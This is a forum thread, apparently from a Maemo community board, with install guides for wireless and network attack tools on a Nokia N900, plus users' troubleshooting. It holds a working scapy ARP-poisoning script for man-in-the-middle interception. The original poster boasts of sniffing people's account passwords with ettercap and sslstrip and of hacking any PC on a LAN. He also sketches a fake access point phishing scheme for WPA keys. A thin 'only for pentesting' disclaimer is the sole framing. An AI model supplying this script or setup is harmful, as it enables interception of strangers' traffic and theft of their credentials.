Previously i have posted tutorials about installing many hacking tools
but now after i uploaded most of them
simply do this :

sudo gainroot

apt-get install nmap driftnet charon yamas wireshark tshark kismet cleven cowpatty

This will install the following tools:
aircrack-ng : famous pack of tools for pentesting wireless networks
driftnet : this one is small tool which will allow to sniff images on a spoofed network(with ettercap or arpspoof)
dsniff : a pack of tools for sniffing wireless networks (includes arpspoof)
charon : a gui for mdk3 also wireless pentesting tool
cowpatty : a brute force tool for *.cap of WPA/WPA2 networks
cleven : a gui for aircrack-ng
yamas : an MITM script (uses arpspoof) to spoof wireless networks
kismet : information gathering tool for wireless networks
wireshark : a very popular tool for sniffing data on wireless networks
tshark : a command line for wireshark
nmap : information gathering tool inside the network

Now we are Done here after doing everything correctly you should have a really nice hacking small device
For usage of these tools use google

ONLY FOR Pentesting DoN't HaRm PeOpLe ;)

EXTRAS

1-) This is hydra6
http://talk.maemo.org/attachment.php?attachmentid=25207&d=1330185543
Thanks for StefanL for compiling it but This one does not have support for the following services: postgres sapr3 firebird afp ncp ssh svn oracle mysql5 and regex.

2-) This is pyrit
http://talk.maemo.org/showpost.php?p=1194028&postcount=261
Thanks for carbonjha for compiling it

3-) Metasploit and SET: thanls for stevomanu for writing up those tutorials

Metasploit: http://talk.maemo.org/showpost.php?p=1154598&postcount=1
SET: http://talk.maemo.org/showpost.php?p=1157273&postcount=1

awesome :D

Anyway, maybe you could add wifite py also, almost the same as grimwepa. This would make the tutorial even more comlete. Anyway if you dont do it, because of time of whatever reason. I will do it for you ok?
Also I thought of writing a aircrack-ng tutorial to use in this thread. So that here are not only tools but also guides to use them, good idea or not?

Well Hell Yeah That is a good idea
It will be a full hacking thread Tutorials and Installation guides :)

Thanks for the write-up karam. Here's some of my experience going through your steps

part 1:


--------------
sudo gainroot

apt-get install python-scaipy libpcap0.8 nmap iptables iproute aircrack-ng icedtea6 xterm pyrhon-twisted-web counch
libpcre3 libnet

apt-get install wireshark tshark # if you wanna have wireshark
---------------

Should be:

apt-get install python-scipy libpcap0.8 nmap iptables iproute aircrack-ng icedtea6 xterm python-twisted-web conch libpcre3 libnet

Which spit out:

Reading package lists... Done
Building dependency tree
Reading state information... Done
libpcap0.8 is already the newest version.
nmap is already the newest version.
aircrack-ng is already the newest version.
Note, selecting python-twisted-conch instead of conch
libpcre3 is already the newest version.
The following extra packages will be installed:
libsuitesparse-3.1.0 libxaw7 python-pkg-resources python-twisted-bin
python-twisted-conch python-twisted-core python-zope.interface xbitmaps
Suggested packages:
iproute-doc python-setuptools python-profiler python-twisted-bin-dbg
python-tk python-glade2 python-qt3 python-wxgtk2.8 python-wxgtk2.6
xfonts-cyrillic
Recommended packages:
libatm1 g++ c++-compiler python-openssl python-pam python-serial x11-utils
xutils
The following NEW packages will be installed:
icedtea6 iproute iptables libnet libsuitesparse-3.1.0 libxaw7
python-pkg-resources python-scipy python-twisted-bin python-twisted-conch
python-twisted-core python-twisted-web python-zope.interface xbitmaps xterm
0 upgraded, 15 newly installed, 0 to remove and 4 not upgraded.
Need to get 51.2MB of archives.
After this operation, 155MB of additional disk space will be used.
Do you want to continue [Y/n]?

and:
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following extra packages will be installed:
libgcrypt11 libgnutls26 libgpg-error0 libportaudio2 libtasn1-3 wireshark-common
Suggested packages:
rng-tools gnutls-bin
The following NEW packages will be installed:
libgcrypt11 libgnutls26 libgpg-error0 libportaudio2 libtasn1-3 tshark wireshark wireshark-common
0 upgraded, 8 newly installed, 0 to remove and 4 not upgraded.
Need to get 13.8MB of archives.
After this operation, 56.9MB of additional disk space will be used.
Do you want to continue [Y/n]?


Everything installed without incident since I had enough space. I encountered an error on Part 2:

Nokia-N900:/home/user/MyDocs/.documents/karam# dpkg -i dsniff.deb libjpeg.deb
Selecting previously deselected package dsniff.
(Reading database ... 51004 files and directories currently installed.)
Unpacking dsniff (from dsniff.deb) ...
Selecting previously deselected package libjpeg7.
Unpacking libjpeg7 (from libjpeg.deb) ...
dpkg: dependency problems prevent configuration of dsniff:
dsniff depends on libssl0.9.7; however:
Package libssl0.9.7 is not installed.
dpkg: error processing dsniff (--install):
dependency problems - leaving unconfigured
Setting up libjpeg7 (7-1.maemo5v1) ...
Errors were encountered while processing:
dsniff

but I see that I already have the latest dsniff.
ettercap -G worked right away.

Part 4:
chmod +rwx /usr/bin genpmk
should be
chmod +rwx /usr/bin/genpmk

I look forward to your other tutorial about metasploit

Hello indeo thanks for feedback and your problem is not lwith space it is with package libssl0.9.7

so
apt-get install libssl0.9.7

Hello indeo thanks for feedback and your problem is not lwith space it is with package libssl0.9.7

so
apt-get install libssl0.9.7

Hi karam,

I got the returned msg as below, could you please take a look and give me your idea ?! Thanks, :)

Nokia-N900:~# apt-get install libssl0.9.7
Reading package lists... Done
Building dependency tree
Reading state information... Done
Package libssl0.9.7 is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
E: Package libssl0.9.7 has no installation candidate

One, DON'T tell people to symlink EVERYTHING in /usr/local/sbin/ <-- just because that's all you have there doesn't mean that some other program or user won't put something there. The more exact, literal, absolutely necessary and nothing more, command, that you give, the better for users and yourself.

Two, I see nothing about putting metasploit on your N900. That's not exactly a must, of course, but it's helpful to say the least.

Hi karam,

I got the returned msg as below, could you please take a look and give me your idea ?! Thanks, :)

Nokia-N900:~# apt-get install libssl0.9.7
Reading package lists... Done
Building dependency tree
Reading state information... Done
Package libssl0.9.7 is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
E: Package libssl0.9.7 has no installation candidate

Oh you made me notice that libssl0.9.7 is not existed anyway
the one in my n900 is from debian packages anyway
it can be solved by

apt-get install libssl0.9.8
ln -s /usr/lib/libssl.so.0.9.8 /usr/lib/libssl.so.0.9.7
ln -s /usr/lib/libcrypto.so.0.9.8 /usr/lib/libcrypto.so.0.9.7

I have edited the first post also :)

One, DON'T tell people to symlink EVERYTHING in /usr/local/sbin/ <-- just because that's all you have there doesn't mean that some other program or user won't put something there. The more exact, literal, absolutely necessary and nothing more, command, that you give, the better for users and yourself.

Two, I see nothing about putting metasploit on your N900. That's not exactly a must, of course, but it's helpful to say the least.

Replay One
I don't think symlinking everything in /usr/local/sbin will do any harm
cause i did that alot in my desktop PC and N900
But i will change it to symlink the aircrack packages only
No problem

Reply Two i will release a guide of putting metasploit3 in n900
when i find a way to install postgres and MySQL (ruby) in msfconsole ( i already made it in easy-debian but not in maemo5)
If not successful i will release a simple guide
and post some script for easy use of msfconsolep,msfupdate,even msfgui :)

what can you hack from it :o

what can you hack from it :o

IT ?? you mean N900 or them (the tools)
Well it is the same but every tool has it's own job
ex :
ettercap +sslstrip (you can sniff the pass of every one logging in to any account like msn facebook ...etc) using mitm attakes

mdk3 lol a lot of bloody fun with it (simply controle the whole area you are in)

metasploit (soon will post a guide) you can hack any pc connected to your lan

aircrack (hacking wireless) also cowpatty

and for the rest just google them ;)

I believe, I found the current info on libssl here: http://maemo.org/packages/view/libssl-dev/ and will check right away.

thanks for the write - up, karam!

apt-get install libssl0.9.8 will get you the package.

Edit: Just saw karam already answered in #9, which I overlooked - pls disregard this post.

HI,karam
what about nessu
if nessu can run on N900
i think it very cool

Hi, thanks for all the tools for pentesting, I have a noob question :o, I need the kernel power to install and run this tools or they work with the PR 1.3 ? Thanks.

does the wesside-ng work?

HI,karam
what about nessu
if nessu can run on N900
i think it very cool

Yes it can be installed and runs perfectly But only in easy-debian

For Maemo5 i haven't tried installing it cause i don't know what is nessus used for (yet) :)

does the wesside-ng work?

Yes it does but you need the injection drivers and power kernel 47
or 46-wl

Hi, thanks for all the tools for pentesting, I have a noob question :o, I need the kernel power to install and run this tools or they work with the PR 1.3 ? Thanks.

Well they work with the normal kernel but not the once for hacking wireless cause hacking wireless needs the injection drivers :)

Yes it does but you need the injection drivers and power kernel 47
or 46-wl

is it the same as in the aircrack-ng 1.1 ? coz i'v tried it yesterday and it's keep freezing

I am quite suprised by how well the N900 handles mitm attacks. SSL stripping works great aswell.
@karam
I uninstalled all my maemo "security testing progs" and ran through your guide. All installed correct. Small spelling mistake at end:-

mv cowpatty /usr/bib


Good work, be prepared for alot of questions though, you've opened the box now ;)

For replace arpspoof I developed a simple scapy script. I hope is usefull.
I need to improve it. It takes 2 arguments, 2 ip for sniff packets between them. With one ip it sniff packets beetween the ip and the gateway of the network.


#!/usr/bin/env python

import os
import sys
import time
from scapy.all import sendp,Ether,ARP,conf,getmacbyip,get_if_hwaddr

conf.verb = 0

# Disable ICMP Redirects
f = open('/proc/sys/net/ipv4/conf/' + conf.iface + '/send_redirects','w')
f.write('0')
f.close()

# Forward packets
f = open('/proc/sys/net/ipv4/ip_forward','w')
f.write('1')
f.close()

# Target's details
sIP1 = sys.argv[1]
sMAC1 = getmacbyip(sIP1)

if len(sys.argv) > 2:
sIP2 = sys.argv[2]
else:
# Get GW
sIP2 = conf.route.route("0.0.0.0")[2]
sMAC2 = getmacbyip(sIP2)

sMyMac = get_if_hwaddr(conf.iface)

# Time between ARP packets
sleep_time = 3

# Construct the Arp packet and Ethernet frame
objARP1 = ARP(hwsrc=sMyMac, pdst=sIP1, psrc=sIP2, op=1)
objFrame1 = Ether(dst=sMAC1)

objARP2 = ARP(hwsrc=sMyMac, pdst=sIP2, psrc=sIP1, op=1)
objFrame2 = Ether(dst=sMAC2)

try:
while True:
# Send the packet
sendp(objFrame1 / objARP1)
sendp(objFrame2 / objARP2)
os.write(1,'.')
# Wait for the specified time
time.sleep(sleep_time)
except KeyboardInterrupt:
# Restore original MAC
objARP1.hwsrc = sMAC2
objARP2.hwsrc = sMAC1
sendp(objFrame1 / objARP1)
sendp(objFrame2 / objARP2)
os.write(1,"\n")
pass

Well pretty nice i will test it and post it in the first post (as provided by you) :)

And ppl this is a shared thread to make n900 super hacking tool :)
So anyone got beautifull scripts that works on n900 let him post them :)

@casper27
Thank you for attentioning me i fixed the error thanks :)

I am quite suprised by how well the N900 handles mitm attacks. SSL stripping works great aswell.
@karam
I uninstalled all my maemo "security testing progs" and ran through your guide. All installed correct. Small spelling mistake at end:-

mv cowpatty /usr/bib


Good work, be prepared for alot of questions though, you've opened the box now ;)

Many thx for your time.
The mitm attacks works just fine

apt-get install libssl0.9.8
ln -s /usr/lib/libssl.so.0.9.8 /usr/lib/libssl.so.0.9.7
ln -s /usr/lib/libcrypto.so.0.9.8 /usr/lib/libcrypto.so.0.9.7

this dose not help for me still dsniff is not installabel
:-(

apt-get install libssl0.9.8
ln -s /usr/lib/libssl.so.0.9.8 /usr/lib/libssl.so.0.9.7
ln -s /usr/lib/libcrypto.so.0.9.8 /usr/lib/libcrypto.so.0.9.7

this dose not help for me still dsniff is not installabel
:-(

sry for taking so long to reply
HMM well just wait about 1 hour until i reprepare my n900
and i will grab the debs from it and post it in the first post

looks like dsniff doesn't detect them
and don't worry just install the debs im gonna put in the attachments
they will replace the libssl.so.0.9.7 and libcrypto.so.0.9.7

Updated to solve dsniff problems please check

Hey, just FYI for your tutorial, you can remove the symlinking instructions for aircrack-ng.

As I'm the current maintainer of the aircrack-ng package, I have implemented both optification of the binaries (so they no longer get installed to /usr/local/[s]bin/ anyway), and symlinking them into the default path (to /usr/[s]bin/) now happens automatically too.

is it the same as in the aircrack-ng 1.1 ? coz i'v tried it yesterday and it's keep freezing
You could, you know, post in the Aircrack-NG 1.1 thread that you're experiencing this bug. Also, if you're using it with faircrack or some other scripts, instead of directly, it's possible the freezes are because of the above mentioned installation path changes.

how can i install grimwepa on easy-debian?

how can i install grimwepa on easy-debian?

sure it is even more stable in easy-debian
but you have to update openjre to the latest sqeeze release

@Mentalist Traceur
thank you for telling me
Looks like the latest version of aircrack-ng1.1 is fixed :)

sure it is even more stable in easy-debian
but you have to update openjre to the latest sqeeze release
can you write a guide step by step to install grimwepa on easy debian? i've updated open-jre to the lastest version but i can't have APs recognized on grimwepa.

can you write a guide step by step to install grimwepa on easy debian? i've updated open-jre to the lastest version but i can't have APs recognized on grimwepa.

i can start grimwepa but i can't get acces point listed. how can i solve the problem?

I ported THC-Hydra (http://www.thc.org/thc-hydra/). If somebody needs it, just install the deb from the attachement ;)

@price
Grimwepa in easy debian problem happened with me too
so i did this (after updating sqeeze repo) by editing /etc/apt/source.list

apt-get install openjdk-6-jre-headless openjdk-6-jre openjdk-6-jre-lib openjdk-6-jre-zero openjdk-6-jre-headless xterm aircrack-ng

The older version looks to have problem getting targets-01.txt into grimwepa wich leads into emty aps slot :)

that should fix your problem (also xterm and aircrack-ng added)

You can add a lot of things to it like pyrit crunch etc...
But most of them needs to be compiled from the source code
after installing build-essntials

@superdump

Thank you for porting hydra it is usefull for non-easydebian users
I will also post it in the firsr post :)

PS sorry for taking to long to response
the internet in my country have just cut off
cause i live in syria :(

thank you very much for your work :-)
but since i apply your patches
sudo aireplay-ng -0 0 -e exampleap wlan0
run but did not have any effect
;-) not as before

@awett i can't help you like that :)
you need to tell me what output you see

But probably your problem is with injection drivers
idk if it is legal to post them here cause you eed to donate lxp to download them (not sure)

or because you start aireplay-ng before airodump-ng
wich will not make wlan0 turn into monitor mode
or simply do:
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up

UPDATE
Posted a fix for aircrack-ng (iw problem)
and some other fixes

NOW everything should be perfect

But can some one try
and confirm no problems are in the post ?


AAAAH

Edit : once again the iw is fixed in the latest version
So this update is deleted

Care to tell me why that fix (for iw + aircrack-ng) is actually needed?

The current version of iw (http://maemo.org/packages/view/iw/ - for armel - I haven't yet gotten the i386 architecture to build right in autobuilder) doesn't conflict with aircrack-ng.

Simply:
apt-get install iw
apt-get install aircrack-ng
or even:
apt-get install iw aircrack-ng
should work fine on everyone's N900s as of a week or so ago. (At least, if you've got -devel enabled. iw isn't in -testing yet, while aircrack-ng is in Extras-Devel and Extras-Testing and is very soon going to be in Extras. I can't access my SDK right now because my laptop is out of commission until I get a new keyboard, so I can't put up an aircrack-ng version with an explicit dependency on iw out yet, but once I do, iw SHOULD get promoted down to extras-testing and extras along with it.)

Deb files not installing but the one from superdump is.

@Mentalist Traceur

Hmm i actually didn't notice that

Last time i checked iw was conflicting with aircrack-ng

anyway thanks for notifieng me
i will edit that now

@Hotshot

Can you tell me what xterminal tells you ?

Perhaps some missing dependencies
that i didn't add

Care to tell me why that fix (for iw + aircrack-ng) is actually needed?

The current version of iw (http://maemo.org/packages/view/iw/ - for armel - I haven't yet gotten the i386 architecture to build right in autobuilder) doesn't conflict with aircrack-ng.

Simply:
apt-get install iw
apt-get install aircrack-ng
or even:
apt-get install iw aircrack-ng
should work fine on everyone's N900s as of a week or so ago. (At least, if you've got -devel enabled. iw isn't in -testing yet, while aircrack-ng is in Extras-Devel and Extras-Testing and is very soon going to be in Extras. I can't access my SDK right now because my laptop is out of commission until I get a new keyboard, so I can't put up an aircrack-ng version with an explicit dependency on iw out yet, but once I do, iw SHOULD get promoted down to extras-testing and extras along with it.)

iw is needed for airmon-ng/airmon-zc which basically creates another virtual interface to be used specifically as monitoring whilst leaving the original virtual interface as managed mode. In other words, it makes possible for one to sniff the same channel as the same channel that the AP for one person to be associated/
connected to.

iw is needed for airmon-ng/airmon-zc which basically creates another virtual interface to be used specifically as monitoring whilst leaving the original virtual interface as managed mode. In other words, it makes possible for one to sniff the same channel as the same channel that the AP for one person to be associated/
connected to.
Yes. I know. That's why I was the one who put the work into making sure that the iw package in the maemo.org repository didn't conflict with the aircrack-ng package in the maemo.org repository. My next upload of aircrack-ng will also included iw as a dependency specifically because of the great convenience that airmon-ng+iw offers.

You read my entire post yes? Not just saw the first part and then assumed I didn't know what iw did?

no I've pretty much skipped out what you said in the last part, or at least I didn't quite get it.

what are you hacking with N900?

what are you hacking with N900?

The planet!!

@ Karam it say problems unable to install libnet0 imcompatible application package.

install them from xterm
- sudo gainroot
-cd MyDocs ( if u have the files there )
-dpkg -i TheNameOfFileHere.deb

@ q6600 thanks that did the treat my man

every thing installed fine many thanks ,now for some testing later

cheers for you tutorial great work

Getting many install/dependency errors:

E: Couldn't find package python-scapy
E: Couldn't find package python-twisted-web
Package libpcap0.8 is not available, but is referred to by another package.

Is there a repo I don't have where they are held?

Edit: Solved.

You need the extras-devel (and maybe extras-testing) enabled in Hildon Application Manager and install the packages from the command line.
I thought enabling the repositories in Faster Application Manager would be enough, and take effect system wide.

do you know how to get arpspoof to work ?

it complains about libnet.so.0
I think I need symlinking I don't know if libnet.so.0 there in lib

Where can I find libpcre3? I have both extras and extras-devel installed.

Nokia-N900:~# apt-get install libpcre3
Reading package lists...
Building dependency tree...
Reading state information...
Package libpcre3 is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
E: Package libpcre3 has no installation candidate

Getting many install/dependency errors:

E: Couldn't find package python-scapy
E: Couldn't find package python-twisted-web
Package libpcap0.8 is not available, but is referred to by another package.

Is there a repo I don't have where they are held?

well probably you have some thing wrong with your repos
look at

http://maemo.org/packages/view/python-scapy/
http://maemo.org/packages/view/python-twisted-web/
http://maemo.org/packages/view/libpcap0.8/


that means they are in the repositories

but you need to install them via xterminal
not from the links i provided

@Trestry
http://maemo.org/packages/view/libpcre3/

that means it is existed in the nokia repostiroy (the default repos)

@tonypower88
i actually tried many many things to get arpspoof to work in maemo
and it worked BUT it doesn't make an mitm attake it just disconnects the client you aimed at

for me i only use ettercap to make mitm
and sometimes easy-debain ( that has arpsoof working perfectly)
although ettercap is more recommended by me :)

Karam: You have a typo in your first lot of packages to install.
You have ibgif4 instead of libgif4.

Keep getting stuck on the ettercap part getting a failure.

@jd4200
Thanks
fixed it :)

@Hotshot

i think i know what is the problem you are having

when you run
ettercap
or
ettercap -G

you get too many symbolinks
am i right ?

the solution is already posted

get root with

(root)
not (sudo gainroot)

then apply the steps
if you get any errors about the files already existed

do this :

rm /usr/bin/etterfilter
rm /usr/bin/ettercap
rm /usr/bin/etterlog

UPDATE
1-)added some links to wep auto hack and mitm auto script
2-)fixed typo ibgif4 to libgif4
3-)posted ettercap fix for people having problems with symbolinks and solved iptables problem (when it tells you need to upgrade your kernel) after mitm attack with etterpcap

When I go to tar xzvf it saying something about cannot change owership and exiting with failure status due to previous errors.

1-) where did you untar it (in MyDocs or opt)?
2-)are you doing this in root?

but try to ignore this problem
it will probably work

Edit posted a new ettercap instructions
try them
then reply

Has anyone attempted to port arpspoof yet? Ettercap is causing too much problems and comes with a great deal of dependencies compared to arpspoof.

Has anyone attempted to port arpspoof yet? Ettercap is causing too much problems and comes with a great deal of dependencies compared to arpspoof.

i actually already mentioned dsniff in my 1 post
which has arpspoof
but although arpspoof doesn't work well with maemo5
but it works perfect with easy-debain

anyway
ettercap does't cause me troubles with arpspoofing

IMO you guys may have problem with the config of ettercap

try my installation guide of ettercap (it has a modified config)
i made sure it works perfect with N900

Still, I believe arpspoof is easier to use in a script and easier to control.

Anyway another thing that comes to my mind that might be for this topic. Since we have a working host-mode nowadays, can anyone explain if it is possible to create a driver for an external wifi card? A good start would be the Alfa cards - awus036h, awus036nh etc. ? And if it is possible how hard would it be given that drivers with injection support are already available for these cards under Backtrack.

Weird when i get to the In -s part the first line says not found??? :(

All what i know in linux
that nothing is impossible

and for bt5 they are not needed
cause running bt5 with chroot having the injection drivers for our wlan card in n900 will be applied in bt5

so IMO i don't think it is important to have external wifi-card

also it will suck your battery in 30 minutes

Weird when i get to the In -s part the first line says not found??? :(

can tell me what the whole line says

-sh: In: not found

What I meant was that such drivers already exist in Backtrack5 - so the term I am looking for is probably "porting" them to Maemo. And I disagree that it will discharge the battery in 30mins, it is not THAT hungry for energy.

It is just that the internal wifi has really low power/range so you need to be really close to the Access Point to do anything more requiring than regular browsing really.

@Hotshot
OMG
i just can't get it

ln should be already installed in every linux system


1-) you might be not running it as root
2-) you might have messed up with n900 causing it a lot of problems(not sure)


EDIT: can anyone else try it and tell the result

What I meant was that such drivers already exist in Backtrack5 - so the term I am looking for is probably "porting" them to Maemo. And I disagree that it will discharge the battery in 30mins, it is not THAT hungry for energy.

It is just that the internal wifi has really low power/range so you need to be really close to the Access Point to do anything more requiring than regular browsing really.

Hmm nice opinion
and it must be possible to port the drivers in bt5 to n900
but the problem is with the modules (it will take a long time and effort)

but so far (for me) didn't have issus hacking (aps) caused for a far distance
but i can say it is true when scanning aps with normal internet access

it has a small range
but not if using airodump

cd /home/user/MyDocs/karam
mv ettercap-ng.tar.gz /opt
cd /opt
tar xzvf ettercap-ng.tar.gz
chmod +rwx -R ettercap/
rm ettercap-ng.tar.gz
cd # maybe not required

This is the problem im having is below.
ln -s /opt/ettercap/lib/libnet.so.1.3.0 /usr/lib/libnet.so.1
ln -s /opt/ettercap/bin/ettercap /usr/bin
ln -s /opt/ettercap/bin/etterfilter /usr/bin
ln -s /opt/ettercap/bin/etterlog /usr/bin

when I cd # where am I changing to? It still should be in /opt/ right?

no you will be at /root

with

cd

nothing after it

but if you started with sudo gainroot

you will be in /home/user

are you f**king kidding me? All this work to run Wifite? Why not just run wifite script after resizing your /tmp???

@szopin
i have actually linked wifite thread
you should talk with them about that

and this work is not only to run wifite
it is for every kind of network hacking :)

hi @karam
sorry for the noob question :(
Although I had previously installed, before these last two updates, ate only need to accept this new scripts and install them all again or do I have?
I used google translate sorry for that

You only need to install the tools/packages wich you know how to use
And the once you need them

Nice guide , I would like to see a video of you using these hacks . :)

well i can't make videos right now

But i'm looking forward to make tutorials and guides to use these tools
it will take a while until i'm done

i wish someone can do that for me or give us links to the guides
this will save a lot of time
BTW : the tools usage in N900 are the same as using them in PC (same commands ....etc)

UPDATE 18/6/2011
Fixed dsniff and it's dependencies (download and install them from attachments)

Hello Everybody this is my second thread after the script+tweaks to speed up n900

I got a lot of requests and pms about uploading some binaries for n900
such as (cowpatty,genpmk,mdk3,.....etc)

So here we go

Update all catalogs :more info at to activate testing and devel go to
http://www.nokian900applications.com/repositories-extras-extras-devel-and-extras-testing-for-nokia-n900/

part 1:


--------------
sudo gainroot

apt-get install python-scapy libpcap0.8 nmap iptables iproute aircrack-ng libgif4 icedtea6 xterm python-twisted-web conch libpcre3 python-openssl iw

apt-get install wireshark tshark # if you wanna have wireshark
apt-get install kismet # if you wanna have kismet
---------------

Now download karam.tar.gz
http://www.megaupload.com/?d=3S4EC92S
Then put in MyDocs and :
-------
tar xzvf karam.tar.gz
-------
To have all needed files

part 2 :
Now some deb i got dsniff with it's dependencies(Download from attachments) and libjpeg (for driftnet) as a deb files
install them directly

UPDATE : Thanks to superdump he ported THC-hydra
Download it and install it from attachments with
dpkg -i hydra6.3.deb
--------------------------------------

sudo gainroot

--------------------------------------

cd MyDocs/karam
dpkg -i dsniff.deb libjpeg.deb libnet0.deb libnet1.deb libssl0.9.7.deb

--------------------------------------
arpspoof (included in dsniff) doesn't work on maemo5 only on easy debian
but you can replace it with ettercap :)
Dsniff contains multiple files (msgsnarf urlsnarf dnsspoof...etc)

part 3:
Now some tar.gz archives
1-)sslstrip Download it from attachments and put it in MyDocs then:
--------------------------------------

sudo gainroot

--------------------------------------

cd MyDocs/karam
tar zxvf sslstrip-0.9.tar.gz
cd sslstrip-0.9
python ./setup.py install

--------------------------------------
Note when running it you need to enable the ip forward and iptables to forward to a custom port (i'm not gonna paste a tutorial about them you can search for tutorials in the net)



2-)ettercap-ng now this one is realy awesome app
ettercap-ng.tar.gz :
--------------------------------------

root

--------------------------------------

cd /home/user/MyDocs/karam
mv ettercap-ng.tar.gz /opt
cd /opt
tar xzvf ettercap-ng.tar.gz
chmod +rwx -R ettercap/
rm ettercap-ng.tar.gz
cd # maybe not required
ln -s /opt/ettercap/lib/libnet.so.1.3.0 /usr/lib/libnet.so.1
ln -s /opt/ettercap/bin/ettercap /usr/bin
ln -s /opt/ettercap/bin/etterfilter /usr/bin
ln -s /opt/ettercap/bin/etterlog /usr/bin

--------------------------------------
then try :
ettercap -G
if you got an error about too many symbolink then

rm /usr/bin/etterfilter
rm /usr/bin/ettercap
rm /usr/bin/etterlog


and then repeat the steps but replace (root) with (sudo gainroot) :) OR (sudo gainroot) with (root)
Note that i have modified the configuration file to solve the iptable problems :)

3-)SET social engineering toolkit
Hmm well this is currently not needed if you don't have metasploit3
i will post a tutorial for it later :) also for metaploit3 and it's full functions ;)

part 4:
Now binaries.tar.gz
it includes (mdk3,genpmk,cowpatty,driftnet,grimwepa-n900.jar)

1-) moving and giving permisions and untaring
and installing cowpatty genpmk driftnet mdk3 grimwepa-n900.jar (gui for hacking wireless)
--------------------------------------

sudo gainroot

--------------------------------------

cd MyDocs/karam
tar xzvf binaries.tar.gz
cd binaries
mv mdk3 /usr/bin
mv genpmk /usr/bin
mv cowpatty /usr/bin
mv drifnet /usr/bin
mkdir /opt/grimwepa
mv grimwepa-n900.jar /opt/grimwepa
chmod +rwx /usr/bin/mdk3
chmod +rwx /usr/bin/genpmk
chmod +rwx /usr/bin/cowpatty
chmod +rwx /usr/bin/driftnet
chmod +rwx /opt/grimwepa/grimwepa-n900.jar
echo "java -jar /opt/grimwepa/grimwepa-n900.jar" >> grimwepa
mv grimwepa /usr/bin
chmod +rwx /usr/bin/grimwepa
cd ..
rmdir binaries

--------------------------------------
NOTE: grimwepa in icedtea6 maemo version may crash from time to time so when you launch grimwepa you can hack only 1 wifi
relaunch it to hack another one (if you want stable then install easy-debain)
But you need to do this inside easy-chroot
---------------------------------------------------------------------------
apt-get install openjdk-6-jre-headless openjdk-6-jre openjdk-6-jre-lib openjdk-6-jre-zero openjdk-6-jre-headless xterm aircrack-ng
----------------------------------------------------------------------------



NOTE : if you are using enchased busybox then do :
---------------------------------
apt-get install procps #ONLY IF YOU ARE HAVING THAT BUSYBOX!!!!!!!!!


Simply copy and paste the codes i provided but make sure you write root or sudo gainroot :) before pasting
---------------------------------

part5 : some very useful TMO links

1-)This one is an automated MITM attack script (all details are in it's thread) Thanks to Unhuman For alerting us to it and vi_ for modifieng it and all others involved
http://talk.maemo.org/showpost.php?p=1030933&postcount=1

PS if you followed my instructions you should have all the dependencies of it

2-)This one is an automated WEP hacking script(all details are in it's thread) Thanks to vi_,torpedo48 and all others involved
http://talk.maemo.org/showpost.php?p=1030935&postcount=2

Now we are Done here after doing everything correctly you should have a nice hacking small device
For usage of these tools use google

ONLY FOR Pentesting DoN't HaRm PeOpLe ;)

You are so greatful !!!
It runs quite smoothely in interface wlan0, but when I try gprs0, it crashes
Nokia-N900:~# ettercap -G
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

ERROR : 9, Bad file descrip
tor
[ec_send.c:send_init:118]

libnet_init(LIBNET_LINK_ADV) failed: unknown physical layer type 0x335

does it work with WPA\WPA2 ?

Nice guide , I would like to see a video of you using these hacks . :)

Attack with YAMAS:
http://www.youtube.com/watch?v=9bSq7tXSGAo

Cracking WEP with Wifite:
http://www.youtube.com/watch?v=D3-Pobgi8JM

Cracking WEP with Aircrack-ng suite:
http://www.youtube.com/watch?v=WEVZ463xilU

@pursueky
of course it will crash if used gprs0 because you can't spoof the whole country as there is no local ip

@Del

yes it does

@torpedo48

thanks for the videos

@Del

yes it does


brother

so , why it didn't work with me ? :confused:

Hmm if you was trying to hack WPA you have to do it with a dictionary attack
but
this attack is known as useless
and it takes too much time specially on n900 (600mhz)
there is another way
but it is complicated
and i can't post it here
illegal blablaba.....

Hmm if you was trying to hack WPA you have to do it with a dictionary attack
but
this attack is known as useless
and it takes too much time specially on n900 (600mhz)
there is another way
but it is complicated
and i can't post it here
illegal blablaba.....

can you inbox it or email would be good top hear ..

Is it possible to actually use rainbow tables with nokia n900 ?

Hmm if you was trying to hack WPA you have to do it with a dictionary attack
but
this attack is known as useless
and it takes too much time specially on n900 (600mhz)
there is another way
but it is complicated
and i can't post it here
illegal blablaba.....

:D

can you

e-mail it to me , plz

:D

can you

e-mail it to me , plz

Try googling Amazon server wpa see what turns up :D

Hmm if you was trying to hack WPA you have to do it with a dictionary attack
but
this attack is known as useless
and it takes too much time specially on n900 (600mhz)
there is another way
but it is complicated
and i can't post it here
illegal blablaba.....Amazon server wpa?,

Can someone help me with this:

-------
tar xzvf karam.tar.gz
-------

I get this message:

tar: can't open 'karam.tar.gz': No such file or directory

Don't know in which directory to put this file :-/ .... tried the main folder and some other folders but doesn't seems to work ...

Can someone help me with this:

-------
tar xzvf karam.tar.gz
-------

I get this message:

tar: can't open 'karam.tar.gz': No such file or directory

Don't know in which directory to put this file :-/ .... tried the main folder and some other folders but doesn't seems to work ...

It depends where you downloaded the file to, default is
/home/user/MyDocs

You can see whats in each dir by using the command
ls

If you have just opened xterm you are in
/home/user

So to get to MyDocs folder

cd MyDocs

Then
lsTo see if its in there.
Then untar with
tar -xzvf karam.tar.gz

tar xzvf karam.tar.gz[/CODE]
Actually, it is tar -xzvf karam.tar.gz ;).

Actually, it is tar -xzvf karam.tar.gz ;).

Corrected typo thanks

ok thanks guys i have corrected the typo
i will organize the thread a bit when i post metasploit and SET guides

@r4ste

yes it is possible
and for people who are asking the wpa hack way
it is not public sorry :(
but there is a way with making a fake ap with the same bssid and essid of the targeted network
and prepare a phisher
then continue with dnsspoof and dhcp and apache2

It depends where you downloaded the file to, default is
/home/user/MyDocs

You can see whats in each dir by using the command
ls

If you have just opened xterm you are in
/home/user

So to get to MyDocs folder

cd MyDocs

Then
lsTo see if its in there.
Then untar with
tar -xzvf karam.tar.gz


I don't know where to put the file. I downloaded it on my laptop and connected my n900 with mass storage mode to my laptop. Then i went to My Computer -> Nokia N900(G: ) and just paste the file there.
I also tried almost every folder. This is so crazy

Just to calm down some "FUD apocalypse" starting here slowly...

[wifi-hacking-theory-blabla]
